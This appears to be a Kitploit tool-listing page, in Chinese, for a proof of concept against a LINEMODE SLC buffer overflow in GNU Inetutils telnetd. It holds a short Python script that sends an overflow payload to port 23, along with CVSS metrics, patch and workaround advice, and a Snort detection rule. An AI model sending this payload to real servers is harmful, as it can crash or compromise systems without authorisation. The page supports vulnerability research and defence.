Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-32746 — # CVE-2026-32746 的概念验证漏洞利用程序 针对 GNU Inetutils telnetd 中通过 LINEMODE SLC 缓冲区溢出导致的关键远程代码执行漏洞的概念验证利用程序。包含技术分析、CVSS 指标及缓解措施指南。 | Kitploit
工具/GitHubGitHub/kaleth4/cve-2026-32746
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubkaleth4/cve-2026-32746

CVE-2026-32746

# CVE-2026-32746 的概念验证漏洞利用程序 针对 GNU Inetutils telnetd 中通过 LINEMODE SLC 缓冲区溢出导致的关键远程代码执行漏洞的概念验证利用程序。包含技术分析、CVSS 指标及缓解措施指南。

查看仓库
3个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚨 CVE-2026-32746 GNU Inetutils Telnetd RCE

🔥 📌 执行摘要

严重漏洞 | CVSS 9.8 | 远程代码执行! 影响范围: GNU Inetutils Telnetd(2.7 之前的版本) 类型: LINEMODE SLC 子选项处理器中的越界写入(OOB Write) 攻击向量: 网络(端口 23) | 无需身份验证 影响: 以 Telnetd 进程权限执行远程代码(RCE)


🎯 📖 技术描述

在 GNU Inetutils 的 telnetd 守护进程的 add_slc 函数中发现了一个越界写入(OOB Write)缓冲区溢出漏洞。该缺陷允许远程攻击者通过操纵 Telnet 协议的 SLC(设置本地字符)子选项来注入任意代码。

🔍 关键细节

  • 易受攻击的函数: add_slc(本地字符处理)。
  • 根本原因: 内部缓冲区缺乏边界验证。
  • 利用方式: 批量发送恶意 LINEMODE SLC 序列。
  • 前提条件: 无(可直接访问端口 23)。

🛠️ 💻 概念验证(PoC)

攻击者可以通过恶意 Telnet 载荷利用此漏洞,使内部缓冲区溢出:

root@kitploit:~
#!/usr/bin/env python3
import socket
import sys

# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC  = b'\xff'
SB   = b'\xfa'
SE   = b'\xf0'
LINEMODE = b'\x22'
SLC  = b'\x03'

target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"

# Payload generado para desbordar add_slc
malicious_slc = b"\x01\x03\x41" * 600  # Repetición de 600 veces

payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE

print(f"[*] Enviando payload malicioso a {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((target, 23))
    s.sendall(payload)
    print("[+] Payload entregado. Verificando caída del servicio/RCE...")

⚠️ ⚠️ 警告! 此代码仅用于教育和研究目的。在未经授权的系统上使用是非法的。


📊 📈 风险指标(CVSS 3.1)

指标值描述
攻击向量AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H远程,无需身份验证
评分9.8(严重) 🔴对机密性、完整性和可用性造成高影响
发布时间2026年3月13日最后修改:2026年5月5日

🛡️ 🔒 缓解措施与解决方案

🚀 立即解决方案

✅ 将 GNU Inetutils 更新到已修补版本(2.7 之后)。

⚡ 临时规避措施

🔹 禁用 telnetd 并迁移到 SSH(推荐)。 🔹 在边界防火墙上阻止端口 23。 🔹 配置 IDS/IPS 以检测异常的 LINEMODE SLC 序列。

🛡️ 附加安全配置

  • Snort/Suricata 规则:
    root@kitploit:~
    alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)
    
下载工具